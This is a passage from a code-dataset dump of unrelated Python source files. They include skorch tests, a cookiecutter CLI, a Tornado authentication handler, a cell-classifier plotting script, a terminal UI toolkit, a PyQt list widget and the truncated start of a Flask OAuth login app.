f1=torch.arange(12).reshape(4, 3),\n )\n sldict1 = sldict_cls(\n f0=np.arange(4),\n f1=torch.arange(12).reshape(4, 3),\n )\n\n assert sldict0 == sldict1\n\n sldict1['f0'] = torch.arange(4)\n assert sldict0 != sldict1\n\n def test_equals_different_keys(self, sldict_cls):\n sldict0 = sldict_cls(\n a=np.arange(3),\n )\n sldict1 = sldict_cls(\n a=np.arange(3),\n b=np.arange(3, 6),\n )\n assert sldict0 != sldict1\n\n\nclass TestPredefinedSplit():\n\n @pytest.fixture\n def predefined_split(self):\n from skorch.helper import predefined_split\n return predefined_split\n\n def test_pickle(self, predefined_split, data):\n from skorch.dataset import Dataset\n\n valid_dataset = Dataset(*data)\n train_split = predefined_split(valid_dataset)\n\n # does not raise\n pickle.dumps(train_split)\n","sub_path":"skorch/tests/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":8842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"474256972","text":"# -*- coding: utf-8 -*-\n# Adapted from https://github.com/quantumblacklabs/kedro/blob/0.17.5/kedro/framework/cli/starters.py\n\n\nimport importlib.resources\nimport shutil\nfrom pathlib import Path\n\nimport click\nimport yaml\nfrom kedro.framework.cli.starters import _fetch_config_from_user_prompts\nfrom kedro.framework.cli.utils import KedroCliError\n\nimport eensight.templates\n\nDIRECTORY_ARG_HELP = \"\"\"An optional directory inside which the resources repository\nshould reside. If no value is provided, the current working directory will be used.\"\"\"\n\n\ndef _clean_pycache(path: Path):\n \"\"\"Recursively clean all __pycache__ folders from `path`.\n Args:\n path: Existing local directory to clean __pycache__ folders from.\n \"\"\"\n to_delete = [each.resolve() for each in path.rglob(\"__pycache__\")]\n\n for each in to_delete:\n shutil.rmtree(each, ignore_errors=True)\n\n\n@click.group(name=\"eensight\")\ndef start_cli():\n pass\n\n\n@start_cli.group()\ndef resources():\n \"\"\"Initialize the eensight resources.\"\"\"\n\n\n@resources.command(\"init\")\n@click.option(\n \"--output-dir\",\n \"-o\",\n type=click.Path(exists=False, file_okay=False),\n default=None,\n help=DIRECTORY_ARG_HELP,\n)\ndef init(output_dir):\n \"\"\"Create a repository for the eensight resources.\"\"\"\n from cookiecutter.generate import generate_context\n from cookiecutter.main import cookiecutter # for performance reasons\n\n with importlib.resources.path(\n eensight.templates, \"cookiecutter.json\"\n ) as cookiecutter_dir:\n cookiecutter_context = generate_context(cookiecutter_dir).get(\n \"cookiecutter\", {}\n )\n cookiecutter_dir = cookiecutter_dir.parent.resolve()\n prompts_yml = cookiecutter_dir / \"prompts.yml\"\n try:\n with prompts_yml.open(\"r\") as prompts_file:\n prompts_required = yaml.safe_load(prompts_file)\n except Exception as exc:\n raise KedroCliError(\n \"Failed to generate project: could not load prompts.yml. \" + str(exc)\n ) from exc\n\n config = _fetch_config_from_user_prompts(prompts_required, cookiecutter_context)\n\n cookiecutter_args = {\n \"output_dir\": output_dir or str(Path.cwd().resolve()),\n \"no_input\": True,\n \"extra_context\": config,\n }\n try:\n resources_path = cookiecutter(\n template=str(cookiecutter_dir), **cookiecutter_args\n )\n except Exception as exc:\n raise KedroCliError(\n \"Failed to generate resourse repository when running cookiecutter. \"\n + str(exc)\n ) from exc\n\n _clean_pycache(Path(resources_path))\n click.secho(\n f\"\\nResource repository generated in {resources_path}\",\n fg=\"bright_green\",\n )\n","sub_path":"src/eensight/framework/cli/starter.py","file_name":"starter.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446472835","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport logging\nfrom datetime import datetime, timedelta\n\nfrom ujson import dumps\nfrom tornado.web import RequestHandler\n\nfrom holmes import __version__\nfrom holmes.models import User\nimport holmes.utils as utils\n\n\nclass BaseHandler(RequestHandler):\n\n @property\n def config(self):\n return self.application.config\n\n def initialize(self, *args, **kw):\n self.is_public = kw.pop('is_public', False)\n super(BaseHandler, self).initialize(*args, **kw)\n\n locale = self.get_browser_locale()\n self._ = utils.install_i18n(locale.code)\n self.jwt = utils.Jwt(self.config.SECRET_KEY)\n\n def get_authenticated_user(self):\n authenticated, payload = self.is_authenticated()\n if authenticated:\n user_email = payload['sub']\n user = User.by_email(user_email, self.db)\n return user\n else:\n return None\n\n def validate_superuser(self):\n user = self.get_authenticated_user()\n if not user or not user.is_superuser:\n self.set_unauthorized()\n return False\n return True\n\n def set_unauthorized(self):\n self.set_status(401)\n self.write('Unauthorized')\n self.finish()\n\n def renew_authentication(self, payload):\n payload.update(dict(\n iat=datetime.utcnow(),\n exp=datetime.utcnow() + timedelta(\n seconds=self.config.SESSION_EXPIRATION\n )\n ))\n token = self.jwt.encode(payload)\n self.set_cookie('HOLMES_AUTH_TOKEN', token)\n\n def is_authenticated(self):\n return self.jwt.try_to_decode(self.get_cookie('HOLMES_AUTH_TOKEN'))\n\n def authenticate_request(self):\n authenticated, payload = self.is_authenticated()\n if authenticated:\n self.renew_authentication(payload)\n else:\n self.set_unauthorized()\n\n def prepare(self):\n if self.request.method != 'OPTIONS' and not self.is_public:\n self.authenticate_request()\n\n def log_exception(self, typ, value, tb):\n for handler in self.application.error_handlers:\n handler.handle_exception(\n typ, value, tb, extra={\n 'url': self.request.full_url(),\n 'ip': self.request.remote_ip,\n 'holmes-version': __version__\n }\n )\n\n super(BaseHandler, self).log_exception(typ, value, tb)\n\n def on_finish(self):\n if self.application.config.COMMIT_ON_REQUEST_END:\n if self.get_status() > 399:\n logging.debug('ROLLING BACK TRANSACTION')\n self.db.rollback()\n else:\n logging.debug('COMMITTING TRANSACTION')\n self.db.flush()\n self.db.commit()\n self.application.event_bus.flush()\n\n def options(self, *args):\n self.set_status(200)\n self.finish()\n\n def set_default_headers(self):\n self.set_header(\n 'Access-Control-Allow-Origin',\n self.application.config.HOLMES_WEB_URL\n )\n self.set_header('Access-Control-Allow-Credentials', 'true')\n self.set_header(\n 'Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS'\n )\n self.set_header('Access-Control-Allow-Headers', 'Accept, Content-Type')\n\n def write_json(self, obj):\n self.set_header(\"Content-Type\", \"application/json\")\n self.write(dumps(obj))\n\n @property\n def cache(self):\n return self.application.cache\n\n @property\n def db(self):\n return self.application.db\n\n @property\n def girl(self):\n return self.application.girl\n","sub_path":"holmes/handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"26284591","text":"print(__doc__)\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport scipy.io as sio\nfrom sklearn import svm\nimport os\nimport fnmatch\nimport time\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm, datasets\nimport matplotlib.gridspec as gridspec\nfrom sklearn.cluster import KMeans\n\n\ndef make_meshgrid(x, y, h=0.001):\n \"\"\"Create a mesh of points to plot in\n\n Parameters\n ----------\n x: data to base x-axis meshgrid on\n y: data to base y-axis meshgrid on\n h: stepsize for meshgrid, optional\n\n Returns\n -------\n xx, yy : ndarray\n \"\"\"\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n\n return xx, yy\n\n\ndef plot_contours(ax, clf, xx, yy, **params):\n \"\"\"Plot the decision boundaries for a classifier.\n\n Parameters\n ----------\n ax: matplotlib axes object\n clf: a classifier\n xx: meshgrid ndarray\n yy: meshgrid ndarray\n params: dictionary of params to pass to contourf, optional\n \"\"\"\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n out = ax.contourf(xx, yy, Z, **params)\n return out\n\n\n\ndef set_class(x):\n if x == 'G1':\n return 1\n elif ('S' in x and 'G1' in x):\n return 2\n elif x == 'S':\n return 4\n elif ('S' in x and 'G2' in x):\n return 3\n elif x == 'G2':\n return 5\n\n else:\n return 0\n\ndef set_color(x):\n if x == 'G1':\n return 'red'\n elif ('S' in x and 'G1' in x):\n return 'yellow'\n elif x == 'S':\n return 'blue'\n elif ('S' in x and 'G2' in x):\n return 'orange'\n elif x == 'G2':\n return 'green'\n else:\n return 'black'\n\n\nclass Cell:\n def __init__(self, totalintensity, area, cellcycle):\n self.totalintensity = int(totalintensity)\n self.area = int(area)\n self.cellcycle = str(cellcycle)\n self.Class = set_class(str(cellcycle))\n\n\n\n\n\n#----------------------------------------START----------------------------------\ncells = []\ncount = 0\njoin=1\ncount_g1=0\ncount_g2=0\n\n#--------------------------------LEGEND-----------------------------------------\n\nG1_patch = mpatches.Patch(color='red', label='G1')\nSG1_patch = mpatches.Patch(color='yellow', label='S/G1')\nS_patch = mpatches.Patch(color='blue', label='S')\nSG2_patch = mpatches.Patch(color='orange', label='S/G2')\nG2_patch = mpatches.Patch(color='green', label='G2')\nError_patch = mpatches.Patch(color='black', label='Invalid Data')\n\n#dir = os.path.dirname(os.path.realpath(__file__))\ndir = os.getcwd()\nfor roots, dirs, files in os.walk(dir):\n for file in files:\n if file.endswith('.mat'):\n path = os.path.realpath(os.path.join(roots,file))\n print(path)\n data = (sio.loadmat(path,struct_as_record=True))['storage']\n for case in data:\n cells.append(Cell(case['TotalIntensity'], case['Area'], case['CellCycle'][0][0]))\n count += 1\n\nprint (count,\" files found\")\n\n\nplt.ioff()\n\nn_figures=1\ntitles=['Area vs Intensity-All']\n\nfor i in range(1,n_figures+1):\n plt.figure(i)\n plt.ylabel('Area')\n plt.xlabel('Intensity')\n plt.title(titles[i-1])\n plt.grid(True)\n plt.legend(handles=[G1_patch,SG1_patch,S_patch,SG2_patch,G2_patch,Error_patch])\n\ncount=0\nfor cell in cells:\n color=set_color(cell.cellcycle)\n plt.plot(cell.totalintensity, cell.area, marker = 'o', markersize=3, color=color)\n if color != 'white':\n count += 1\n\nprint (count,\" cells drawn\")\nplt.savefig('dots.png')\nplt.close()\n\n\n#--------------------------------CLASSIFIER-------------------------------------\n\ndfData = pd.DataFrame(columns=['Intensity', 'Area', 'Class'])\ncount=0\nfor cell in cells:\n if cell.Class !=0:\n add=pd.DataFrame({'Intensity':[cell.totalintensity],\n 'Area':[cell.area],\n 'Class':[cell.Class]})\n dfData=dfData.append(add, ignore_index=True)\n\n\nX = dfData[['Intensity', 'Area']]\nX[['Intensity', 'Area']] = preprocessing.scale(dfData[['Intensity', 'Area']])\ny = dfData['Class']\ny=y.astype('int')\n#print(df.to_string())\n\n\n\n\n\nC = 1.0 # SVM regularization parameter\nmodels = (svm.SVC(kernel='linear', C=C),\n KMeans(n_clusters=3, random_state=0),\n svm.SVC(kernel='rbf', gamma=1/2, C=C),\n svm.SVC(kernel='poly', degree=1, C=C))\nmodels = (clf.fit(X, y) for clf in models)\n\n\n# title for the plots\ntitles = ('SVC with linear kernel',\n 'K Means',\n 'SVC with RBF kernel',\n 'SVC with polynomial (degree 3) kernel')\n\n\n\nfig, sub = plt.subplots(3, 2)\nplt.subplots_adjust(wspace=0.4, hspace=0.4)\n\n\nX0, X1 = X.values[:, 0], X.values[:, 1]\nxx, yy = make_meshgrid(X0, X1)\n\n\n\nprint(\"Lets print\\n\")\nfor clf, title, ax in zip(models, titles, sub.flatten()):\n cf=plot_contours(ax, clf, xx, yy, cmap=plt.cm.coolwarm, alpha=0.8)\n ax.scatter(X0, X1, c=y, cmap=plt.cm.coolwarm, s=20, edgecolors='k')\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xlabel('Intensity')\n ax.set_ylabel('Area')\n ax.set_xticks(())\n ax.set_yticks(())\n ax.set_title(title)\n\n\ngs = gridspec.GridSpec(3, 1)\nax1 = plt.subplot(gs[2, :]) # row 1, span all columns\ncf = ax1.scatter(X0, X1, c=y, cmap=plt.cm.get_cmap('coolwarm',3), s=20, edgecolors='k')\nax1.set_xlim(xx.min(), xx.max())\nax1.set_ylim(yy.min(), yy.max())\nax1.set_xlabel(\"Intensity\")\nax1.set_ylabel(\"Area\")\nax1.set_title(\"No Classificaton\")\ncbar=plt.colorbar(cf, ax=ax1)\ncbar.ax.get_yaxis().set_ticks([])\n\nfor j, lab in enumerate(['G1','G1/S','G2/S']):\n cbar.ax.text(1.5, (2 * j + 1) / 6.0, lab, va='center')\n\n\nprint(\"IM DONE\\n\")\nplt.show()\n\"\"\"\nplt.pause(1)\nplt.figure(2)\nplt.text(0.05, 0.5, 'Click on me to close!', dict(size=30))\nplt.draw()\n\nhappy=True\nwhile happy != False:\n happy = plt.waitforbuttonpress(-1)\n\nplt.close()\n\"\"\"\n","sub_path":"Ignore/classificador.py","file_name":"classificador.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"50715513","text":"import math\nimport textwrap\n\nimport vtk.term\nimport vtk.theming\n\nPLACE_DIRECTION_FREE = -1\nPLACE_DIRECTION_NEXT_TO = 0\nPLACE_DIRECTION_UNDER = 1\n\nRESIZE_DIRECTION_WIDTH = 0b00000001\nRESIZE_DIRECTION_HEIGHT = 0b00000010\nRESIZE_DIRECTION_BOTH = RESIZE_DIRECTION_WIDTH | RESIZE_DIRECTION_HEIGHT\n\nclass Event:\n def __init__(self):\n pass\n\nclass KeyPressEvent(Event):\n def __init__(self, key):\n super().__init__()\n\n self.key = key\n\nclass EventListener:\n def __init__(self, event, action):\n self.event = event\n self.action = action\n\nclass Measurement:\n def __init__(self, percentageLength, deltaLength, relativeMeasurement = None):\n self.percentageLength = percentageLength\n self.deltaLength = deltaLength\n self.relativeMeasurement = relativeMeasurement\n \n def measure(self):\n absoluteMeasurementValue = 0\n\n if self.relativeMeasurement != None:\n absoluteMeasurementValue = math.floor(self.relativeMeasurement.measure() * self.percentageLength)\n \n return absoluteMeasurementValue + self.deltaLength\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\nclass Component:\n def __init__(self, parent):\n self.parent = parent\n self.children = []\n self.eventListeners = []\n \n def place(self):\n self.parent.children.append(self)\n \n def on(self, event, action):\n self.eventListeners.append(EventListener(event, action))\n \n def off(self, event):\n newEventListeners = []\n\n for eventListener in self.eventListeners:\n if eventListener.event != event:\n newEventListeners.append(eventListener)\n \n self.eventListeners = newEventListeners\n \n def handleEvent(self, event):\n for eventListener in self.eventListeners:\n if eventListener.event == type(event):\n eventListener.action(event = event)\n \n def emitEvent(self, event, captured = None, sender = None):\n if sender == None:\n sender = self\n\n self.handleEvent(event)\n\n for child in children:\n child.emitEvent(event, True, sender)\n \n parent.emitEvent(event, False, sender)\n\nclass Application(Component):\n def __init__(self):\n super().__init__(None)\n\n self.running = False\n self.currentFocussedElement = None\n self.x = Measurement(0, 0)\n self.y = Measurement(0, 0)\n self.width = Measurement(0, vtk.term.getTerminalSize()[\"width\"])\n self.height = Measurement(0, vtk.term.getTerminalSize()[\"height\"])\n self.innerWidth = Measurement(0, vtk.term.getTerminalSize()[\"width\"])\n self.innerHeight = Measurement(0, vtk.term.getTerminalSize()[\"height\"])\n self.padding = Measurement(0, 0)\n self.paddingTop = Measurement(0, 0)\n self.paddingBottom = Measurement(0, 0)\n self.paddingLeft = Measurement(0, 0)\n self.paddingRight = Measurement(0, 0)\n \n def _render(self, forceChange = False):\n for child in self.children:\n child._render()\n\n def place(self):\n raise AttributeError(\"Application is the root, and has no parent\")\n\n def start(self):\n self.running = True\n\n try:\n vtk.term.hideCursor()\n\n self._render(True)\n\n forceNextRender = False\n\n while self.running: # Render loop\n self._render(forceNextRender)\n\n forceNextRender = False\n waitingForEvent = True\n\n while waitingForEvent: # Event loop\n try:\n keyPressed = vtk.term.getKey()\n\n if keyPressed != None:\n if self.currentFocussedElement != None:\n self.currentFocussedElement.emitEvent(KeyPressEvent(keyPressed))\n\n waitingForEvent = False\n except:\n vtk.term.write(vtk.styles.Style_Reset()._render())\n vtk.term.clearScreen()\n vtk.term.moveCursorTo(0, 0)\n vtk.term.showCursor()\n\n self.running = False\n waitingForEvent = False\n \n if self.width.measure() != vtk.term.getTerminalSize()[\"width\"] or self.height.measure() != vtk.term.getTerminalSize()[\"height\"]:\n self.width = Measurement(0, vtk.term.getTerminalSize()[\"width\"])\n self.height = Measurement(0, vtk.term.getTerminalSize()[\"height\"])\n\n waitingForEvent = False\n forceNextRender = True\n except Exception as e:\n vtk.term.write(vtk.styles.Style_Reset()._render())\n vtk.term.clearScreen()\n vtk.term.moveCursorTo(0, 0)\n vtk.term.showCursor()\n\n # TODO: Add more info for errors\n if type(e) != KeyboardInterrupt:\n print(e)\n\nclass Widget(Component):\n def __init__(self, parent):\n super().__init__(parent)\n\n self._hasChanges = False\n self._x = Measurement(0, 0, self.parent.innerWidth)\n self._y = Measurement(0, 0, self.parent.innerHeight)\n self._width = Measurement(1, 0, self.parent.innerWidth)\n self._height = Measurement(1, 0, self.parent.innerHeight)\n self._paddingTop = Measurement(0, 0, self.parent.innerHeight)\n self._paddingBottom = Measurement(0, 0, self.parent.innerHeight)\n self._paddingLeft = Measurement(0, 0, self.parent.innerWidth)\n self._paddingRight = Measurement(0, 0, self.parent.innerWidth)\n self._backgroundColour = vtk.theming.backgroundColour\n self._foregroundColour = vtk.theming.foregroundColour\n\n def _render(self):\n for child in self.children:\n if self._hasChanges:\n child._hasChanges = True\n\n child._render()\n \n def place(self, placeDirection = PLACE_DIRECTION_NEXT_TO, placeMargin = Measurement(0, 1)):\n if len(self.parent.children) > 0:\n if placeDirection == PLACE_DIRECTION_NEXT_TO:\n self.x = Measurement(0, self.parent.children[-1].x.measure() + self.parent.children[-1].width.measure() + placeMargin.measure())\n self.y = Measurement(0, self.parent.children[-1].y.measure())\n\n if self.getAbsolutePosition().x + self.width.measure() > vtk.term.getTerminalSize()[\"width\"]:\n self.x = 0\n self.y = Measurement(0, self.parent.children[-1].y.measure() + self.parent.children[-1].height.measure() + placeMargin.measure())\n elif placeDirection == PLACE_DIRECTION_UNDER:\n self.x = 0\n self.y = Measurement(0, self.parent.children[-1].y.measure() + self.parent.children[-1].height.measure() + placeMargin.measure())\n\n super().place()\n \n def resizeToContent(self, resizeDirection = RESIZE_DIRECTION_BOTH):\n if resizeDirection & RESIZE_DIRECTION_WIDTH:\n furthestObject = 0\n\n for child in self.children:\n if child.x.measure() + child.width.measure() > furthestObject:\n furthestObject = child.x.measure() + child.width.measure()\n \n self.innerWidth = furthestObject\n \n if resizeDirection & RESIZE_DIRECTION_HEIGHT:\n furthestObject = 0\n\n for child in self.children:\n if child.y.measure() + child.height.measure() > furthestObject:\n furthestObject = child.y.measure() + child.height.measure()\n \n self.innerHeight = furthestObject\n\n @property\n def x(self):\n return self._x\n \n @x.setter\n def x(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._x = value\n else:\n if value >= 0:\n self._x = Measurement(0, value, self.parent.innerWidth)\n else:\n self._x = Measurement(1, value, self.parent.innerWidth)\n \n @property\n def y(self):\n return self._y\n \n @y.setter\n def y(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._y = value\n else:\n if value >= 0:\n self._y = Measurement(0, value, self.parent.innerHeight)\n else:\n self._y = Measurement(1, value, self.parent.innerHeight)\n \n @property\n def width(self):\n return self._width\n \n @width.setter\n def width(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._width = value\n else:\n self._width = Measurement(0, value, self.parent.innerWidth)\n \n @property\n def height(self):\n return self._height\n \n @height.setter\n def height(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._height = value\n else:\n self._height = Measurement(0, value, self.parent.innerHeight)\n\n @property\n def innerWidth(self):\n return Measurement(0, self.width.measure() - self.paddingLeft.measure() - self.paddingRight.measure(), self.parent.innerWidth)\n \n @innerWidth.setter\n def innerWidth(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._width = Measurement(0, value.measure() - self.paddingLeft.measure() - self.paddingRight.measure(), self.parent.innerWidth)\n else:\n self._width = Measurement(0, value - self.paddingLeft.measure() - self.paddingRight.measure(), self.parent.innerWidth)\n\n @property\n def innerHeight(self):\n return Measurement(0, self.height.measure() - self.paddingTop.measure() - self.paddingBottom.measure(), self.parent.innerHeight)\n \n @innerHeight.setter\n def innerHeight(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._height = Measurement(0, value.measure() - self.paddingTop.measure() - self.paddingBottom.measure(), self.parent.innerHeight)\n else:\n self._height = Measurement(0, value - self.paddingTop.measure() - self.paddingBottom.measure(), self.parent.innerHeight)\n\n @property\n def padding(self):\n return Measurement(0, max(self._paddingTop.measure(), self._paddingBottom.measure(), self._paddingLeft.measure(), self._paddingRight.measure()))\n \n @padding.setter\n def padding(self, value):\n self._hasChanges = True\n\n padding = 0\n\n if type(value) == Measurement:\n padding = value\n else:\n padding = Measurement(0, value, self.parent.padding)\n\n self._paddingTop = padding\n self._paddingBottom = padding\n self._paddingLeft = padding\n self._paddingRight = padding\n \n @property\n def paddingTop(self):\n return self._paddingTop\n\n @paddingTop.setter\n def paddingTop(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._paddingTop = value\n else:\n self._paddingTop = Measurement(0, value, self.parent.paddingTop)\n \n @property\n def paddingBottom(self):\n return self._paddingBottom\n \n @paddingBottom.setter\n def paddingTop(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._paddingBottom = value\n else:\n self._paddingBottom = Measurement(0, value, self.parent.paddingBottom)\n\n @property\n def paddingLeft(self):\n return self._paddingLeft\n \n @paddingLeft.setter\n def paddingLeft(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._paddingLeft = value\n else:\n self._paddingLeft = Measurement(0, value, self.parent.paddingLeft)\n\n @property\n def paddingRight(self):\n return self._paddingRight\n\n @paddingRight.setter\n def paddingRight(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._paddingRight = value\n else:\n self._paddingRight = Measurement(0, value, self.parent.paddingRight)\n\n @property\n def backgroundColour(self):\n return self._backgroundColour\n \n @backgroundColour.setter\n def backgroundColour(self, value):\n self._hasChanges = True\n self._backgroundColour = value\n \n @property\n def foregroundColour(self):\n return self._foregroundColour\n \n @foregroundColour.setter\n def foregroundColour(self, value):\n self._hasChanges = True\n self._foregroundColour = value\n\n def getAbsolutePosition(self):\n absoluteX = 0\n absoluteY = 0\n currentElement = self\n\n while type(currentElement) != Application:\n if currentElement == self:\n absoluteX += currentElement.x.measure()\n absoluteY += currentElement.y.measure()\n else:\n absoluteX += currentElement.x.measure() + currentElement.paddingLeft.measure()\n absoluteY += currentElement.y.measure() + currentElement.paddingTop.measure()\n\n currentElement = currentElement.parent\n \n return Point(absoluteX, absoluteY)\n\nclass Screen(Widget):\n def __init__(self, parent):\n super().__init__(parent)\n\n self.padding = 1\n\n def _render(self):\n vtk.term.write(\n vtk.styles.Style_Reset()._render() +\n self.backgroundColour._render(False) +\n self.foregroundColour._render(True)\n )\n vtk.term.clearScreen()\n vtk.term.moveCursorTo(0, 0)\n\n super()._render()\n\nclass Box(Widget):\n def _render(self): \n for i in range(0, self.height.measure()):\n vtk.term.moveCursorTo(self.getAbsolutePosition().x, self.getAbsolutePosition().y + i)\n vtk.term.write(\n self.backgroundColour._render(False) +\n self.foregroundColour._render(True) +\n \" \" * self.width.measure()\n )\n \n super()._render()\n \nclass Label(Box):\n def __init__(self, parent, text = \"\"):\n super().__init__(parent)\n\n self.backgroundColour = vtk.styles.Colour_Transparent()\n self.text = text\n\n self.resizeToContent()\n\n def resizeToContent(self, resizeDirection = RESIZE_DIRECTION_HEIGHT):\n if resizeDirection & RESIZE_DIRECTION_WIDTH:\n unwrappedTextLines = self.text.split(\"\\n\")\n longestTextLineLength = 0\n\n for line in unwrappedTextLines:\n if len(line) > longestTextLineLength:\n longestTextLineLength = len(line)\n\n self.innerWidth = longestTextLineLength\n\n if resizeDirection & RESIZE_DIRECTION_HEIGHT:\n textWrapper = textwrap.TextWrapper(width = self.innerWidth.measure())\n wrappedTextLines = textWrapper.wrap(text = self.text)\n\n self.innerHeight = len(wrappedTextLines)\n\n def _render(self):\n super()._render()\n\n textWrapper = textwrap.TextWrapper(width = self.innerWidth.measure())\n wrappedTextLines = textWrapper.wrap(text = self.text)\n\n for i in range(0, min(len(wrappedTextLines), self.innerHeight.measure())):\n vtk.term.moveCursorTo(self.getAbsolutePosition().x + self.paddingLeft.measure(), self.getAbsolutePosition().y + self.paddingTop.measure() + i)\n vtk.term.write(\n self.backgroundColour._render(False) +\n self.foregroundColour._render(True) +\n wrappedTextLines[i]\n )\n\nclass Button(Label):\n def __init__(self, parent, text = \"\"):\n super().__init__(parent)\n\n self.backgroundColour = vtk.theming.buttonBackgroundColour\n self.foregroundColour = vtk.theming.buttonForegroundColour\n self.text = text\n\n self.resizeToContent(resizeDirection = RESIZE_DIRECTION_BOTH)\n \n def _render(self):\n super()._render()\n\n textWrapper = textwrap.TextWrapper(width = self.innerWidth.measure())\n wrappedTextLines = textWrapper.wrap(text = self.text)\n longestTextLineLength = 0\n\n for line in wrappedTextLines:\n if len(line) > longestTextLineLength:\n longestTextLineLength = len(line)\n\n for i in range(0, min(len(wrappedTextLines), self.innerHeight.measure())):\n vtk.term.moveCursorTo(self.getAbsolutePosition().x + self.paddingLeft.measure(), self.getAbsolutePosition().y + self.paddingTop.measure() + i)\n vtk.term.write(\n self.backgroundColour._render(False) +\n self.foregroundColour._render(True) +\n (\" \" * ((longestTextLineLength - len(wrappedTextLines[i])) // 2)) + wrappedTextLines[i]\n )","sub_path":"build/lib/vtk/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":17003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"354266861","text":"from PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtCore import Qt\nfrom pythontools.gui.object import Object\n\nclass ListWidget(Object):\n\n def __init__(self, window):\n super(ListWidget, self).__init__(window)\n self.obj = QtWidgets.QListWidget(window.window)\n self.obj.setContextMenuPolicy(Qt.CustomContextMenu)\n\n def setContextMenu(self, actions, openOnylIfItemSelected=True):\n def rightMenuShow():\n if openOnylIfItemSelected is False or self.getSelectedItem() is not None:\n menu = QtWidgets.QMenu(self.obj)\n for action in actions:\n menu.addAction(action)\n menu.exec_(QtGui.QCursor.pos())\n\n self.obj.customContextMenuRequested[QtCore.QPoint].connect(rightMenuShow)\n return self\n\n def createContextMenuAction(self, name, function):\n return QtWidgets.QAction(name, self.obj, triggered=function)\n\n def addItem(self, text, icon=None, toolTip=None):\n item = QtWidgets.QListWidgetItem(text)\n if icon is not None:\n item.setIcon(icon)\n if toolTip is not None:\n item.setToolTip(toolTip)\n item.toolTip()\n self.obj.addItem(item)\n return self\n\n def removeItem(self, text, toolTip=None):\n for i in range(self.obj.count()):\n item = self.obj.item(i)\n if item.text() == text and (toolTip is None or item.toolTip() == toolTip):\n self.obj.takeItem(i)\n\n def getSelectedItem(self):\n try:\n return self.obj.selectedItems()[0].text()\n except:\n return None\n\n def clearItems(self):\n self.obj.clear()\n\n def setAcceptDrops(self, bool):\n self.obj.setAcceptDrops(bool)\n return self\n\n def onFileDragEvent(self, function):\n def dragMoveEvent(event):\n if event.mimeData().hasUrls:\n event.setDropAction(Qt.CopyAction)\n event.accept()\n else:\n event.ignore()\n\n self.obj.dragMoveEvent = dragMoveEvent\n\n def dragEnterEvent(event):\n if event.mimeData().hasUrls:\n event.accept()\n else:\n event.ignore()\n\n self.obj.dragEnterEvent = dragEnterEvent\n\n def dropEvent(event):\n if event.mimeData().hasUrls:\n event.setDropAction(Qt.CopyAction)\n event.accept()\n files = []\n for url in event.mimeData().urls():\n files.append(str(url.toLocalFile()))\n function(files)\n else:\n event.ignore()\n\n self.obj.dropEvent = dropEvent\n return self\n\n def onDoubleClick(self, on_double_click):\n self.obj.itemDoubleClicked.connect(on_double_click)\n return self","sub_path":"pythontools/gui/listwidget.py","file_name":"listwidget.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"385991560","text":"from flask import Flask, redirect, url_for, render_template\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.login import LoginManager, UserMixin, login_user, logout_user,\\\n current_user, session\nfrom oauth import OAuthSignIn\n\n# copy oauthConfig.py.EXAMPLE to oauthConfig.py\n# oauthConfig.py is NOT COMMITTED to the github repo.\n\nimport os\n\n# These you get from the developer pages of Facebook, Twitter and Google.\n# See the README.md for more instructions.\n\nimport os\n\noauthIdsAndSecrets = {\n 'facebook': {\n 'id': os.environ['FACEBOOK_APP_ID'],\n 'secret': os.environ['FACEBOOK_APP_SECRET'],\n },\n}\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.environ['SESSION_SECRET']\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']\napp.config['OAUTH_CREDENTIALS'] = oauthIdsAndSecrets\n\ndb = SQLAlchemy(app)\nlm = LoginManager(app)\nlm.login_view = 'index'\n\n\nclass User(UserMixin, db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n social_id = db.Column(db.String(64), nullable=False, unique=True)\n nickname = db.Column(db.String(64), nullable=False)\n email = db.Column(db.String(64), nullable=True)\n\n\n@lm.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/logout')\ndef 